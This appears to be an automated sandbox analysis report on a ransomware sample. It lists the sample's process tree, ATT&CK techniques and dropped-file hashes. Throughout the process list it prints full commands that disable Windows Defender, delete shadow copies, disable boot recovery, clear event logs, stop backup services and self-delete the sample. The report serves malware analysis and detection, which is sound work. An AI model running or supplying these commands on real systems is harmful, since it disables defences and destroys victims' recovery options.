The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\zi1ysv64h.exe
"C:\Users\Admin\AppData\Local\Temp\zi1ysv64h.exe"
1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3920

C:\Windows\SYSTEM32\sc.exe
sc.exe config "SstpSvc" start= disabled
2⤵
- Launches sc.exe
PID:804

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2280

C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
2⤵
- Interacts with shadow copies
PID:2236

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
2⤵
PID:4956

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
2⤵
PID:3792

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
2⤵
PID:2596

C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
2⤵
- Modifies boot configuration data using bcdedit
PID:2228

C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
2⤵
- Modifies boot configuration data using bcdedit
PID:3704

C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4608

C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1392

C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl application
2⤵
- Clears Windows event logs
PID:5036

C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl security
2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3772

C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl system
2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3340

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:4616

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
2⤵
- Modifies security service
PID:1416

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:2252

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:4992

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:4076

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:4972

C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
2⤵
- Modifies registry class
PID:2748

C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
2⤵
- Modifies registry class
PID:424

C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
2⤵
PID:2356

C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
2⤵
PID:3576

C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
2⤵
PID:428

C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
2⤵
PID:308

C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
2⤵
PID:3588

C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
2⤵
PID:4980

C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
2⤵
PID:4224

C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
2⤵
PID:2480

C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
2⤵
PID:4560

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
2⤵
PID:3912

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
2⤵
PID:4684

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
2⤵
PID:440

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
2⤵
PID:4284

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
2⤵
PID:4764

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
2⤵
PID:4852

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
2⤵
- Modifies Windows Defender Real-time Protection settings
PID:364

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
2⤵
- Modifies Windows Defender Real-time Protection settings
PID:3464

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
2⤵
- Modifies Windows Defender Real-time Protection settings
PID:3896

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
2⤵
- Modifies Windows Defender Real-time Protection settings
PID:4652

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
2⤵
PID:4728

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
2⤵
PID:2224

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
2⤵
PID:1168

C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
2⤵
- Modifies Windows Defender Real-time Protection settings
PID:3712

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:1644

C:\Windows\SYSTEM32\sc.exe
sc.exe config "UnistoreSvc_1815d" start= disabled
2⤵
- Launches sc.exe
PID:5076

C:\Windows\SYSTEM32\sc.exe
sc.exe config "WebClient" start= disabled
2⤵
- Launches sc.exe
PID:2192

C:\Windows\SYSTEM32\sc.exe
sc.exe config "wbengine" start= disabled
2⤵
- Launches sc.exe
PID:4912

C:\Windows\SYSTEM32\sc.exe
sc.exe config "VSS" start= disabled
2⤵
- Launches sc.exe
PID:4504

C:\Windows\SYSTEM32\sc.exe
sc.exe config "vmicvss" start= disabled
2⤵
- Launches sc.exe
PID:4632

C:\Windows\SYSTEM32\sc.exe
sc.exe config "UI0Detect" start= disabled
2⤵
- Launches sc.exe
PID:860

C:\Windows\SYSTEM32\sc.exe
sc.exe config "SDRSVC" start= disabled
2⤵
- Launches sc.exe
PID:4148

C:\Windows\SYSTEM32\sc.exe
sc.exe config "SamSs" start= disabled
2⤵
- Launches sc.exe
PID:2612

C:\Windows\SYSTEM32\net.exe
net.exe stop "UnistoreSvc_1815d" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:4776

C:\Windows\SYSTEM32\net.exe
net.exe stop "WebClient" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:1116

C:\Windows\SYSTEM32\net.exe
net.exe stop "wbengine" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:2864

C:\Windows\SYSTEM32\net.exe
net.exe stop "VSS" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:1832

C:\Windows\SYSTEM32\net.exe
net.exe stop "vmicvss" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:2628

C:\Windows\SYSTEM32\net.exe
net.exe stop "UI0Detect" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:4584

C:\Windows\SYSTEM32\net.exe
net.exe stop "SstpSvc" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:4412

C:\Windows\SYSTEM32\net.exe
net.exe stop "SDRSVC" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:3952

C:\Windows\SYSTEM32\net.exe
net.exe stop "SamSs" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:2936

C:\Windows\SYSTEM32\notepad.exe
notepad.exe C:\K8zJ_HOW_TO_DECRYPT.txt
2⤵
- Opens file in notepad (likely ransom note)
- Suspicious use of FindShellTrayWindow
PID:4056

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\zi1ysv64h.exe"
2⤵
PID:4064

C:\Windows\system32\PING.EXE
ping.exe -n 5 127.0.0.1
3⤵
- Runs ping.exe
PID:756

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
1⤵
PID:308

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
1⤵
PID:3484

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
1⤵
PID:1416

C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
1⤵
- Deletes Windows Defender Definitions
PID:4452

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:4052

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:4868

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:4452

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5036

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:2236

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UnistoreSvc_1815d" /y
1⤵
PID:4680

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
1⤵
PID:4992

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
1⤵
PID:2900

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicvss" /y
1⤵
PID:3596

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
1⤵
PID:1948

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
- Modifies registry class
PID:2356

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
1⤵
PID:1068

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Indicator Removal

T1070

File Deletion

T1070.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Remote System Discovery

T1018

Query Registry

T1012

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Common Files\DESIGNER\K8zJ_HOW_TO_DECRYPT.txt
Filesize
1KB

MD5
f939d786e1fb30d287357d553719cf88

SHA1
b5001e66047bb37310e8b9c78fef2d1ef6443e1f

SHA256
5f3f1382a950d3c94afafb319c58b2b3731bce694966973685aad6bf9b156cad

SHA512
8da927a8e9425e10a29daeb4b93f66484eca789805dd66a29bfee52b59c2a6df9895bc5dfd814eca788ed27b53463cdd4e8983ff2fc04496d5998a4193f3c2a9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
c19f0993277f9641182b4256afd5387a

SHA1
27864a1f3bfa73fb238f0f186f9ab30b9d7b5543

SHA256
ab84624a461f697712d83e8efdbd1217e8b5b63ee4abf599832e0d31d97f7e4b

SHA512
80731efc18bf6c1085d5650f34179ca096b019bee85b26d6cd737602a76dd564b9387b5b816cf352b8ca51f5cbe008147d446fc4f56329ec9f334785a6db525f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f4d43owm.2wt.ps1
Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
F:\temp3.swap.2o4xo
Filesize
769.0MB

MD5
fd751525406eea3ca4346787a43ea76c

SHA1
bab6bf0619343fa25d8fef638ee1e3029bd6aab9

SHA256
da86467a59376358dec033b504c290a89de887733eaf3354c53ba5205a86eb62

SHA512
1050c80d4f4cb1450afbf2b010fab92daadc924c31973c1e13c9b0a29d3812e40d190c5a42a8a22c419b7ebae71eaa7e4a732ee1849bc6a7e6fd7af77f2e003a

Download Submit
memory/4052-13-0x00000225D4900000-0x00000225D4976000-memory.dmp

Filesize
472KB

Download
memory/4052-51-0x00007FFE85070000-0x00007FFE85A5C000-memory.dmp

Filesize
9.9MB

Download
memory/4052-47-0x00000225D4670000-0x00000225D4680000-memory.dmp

Filesize
64KB

Download
memory/4052-7-0x00000225BC130000-0x00000225BC152000-memory.dmp

Filesize
136KB

Download
memory/4052-11-0x00000225D4670000-0x00000225D4680000-memory.dmp

Filesize
64KB

Download
memory/4052-8-0x00007FFE85070000-0x00007FFE85A5C000-memory.dmp

Filesize
9.9MB

Download
memory/4052-9-0x00000225D4670000-0x00000225D4680000-memory.dmp

Filesize
64KB

Download
memory/4052-26-0x00000225D4670000-0x00000225D4680000-memory.dmp

Filesize
64KB

Download
memory/4868-62-0x00000270CBBB0000-0x00000270CBBC0000-memory.dmp

Filesize
64KB

Download
memory/4868-75-0x00000270CBBB0000-0x00000270CBBC0000-memory.dmp

Filesize
64KB

Download
memory/4868-96-0x00000270CBBB0000-0x00000270CBBC0000-memory.dmp

Filesize
64KB

Download
memory/4868-99-0x00007FFE85070000-0x00007FFE85A5C000-memory.dmp

Filesize
9.9MB

Download
memory/4868-60-0x00000270CBBB0000-0x00000270CBBC0000-memory.dmp

Filesize
64KB

Download
memory/4868-59-0x00007FFE85070000-0x00007FFE85A5C000-memory.dmp

Filesize
9.9MB

Download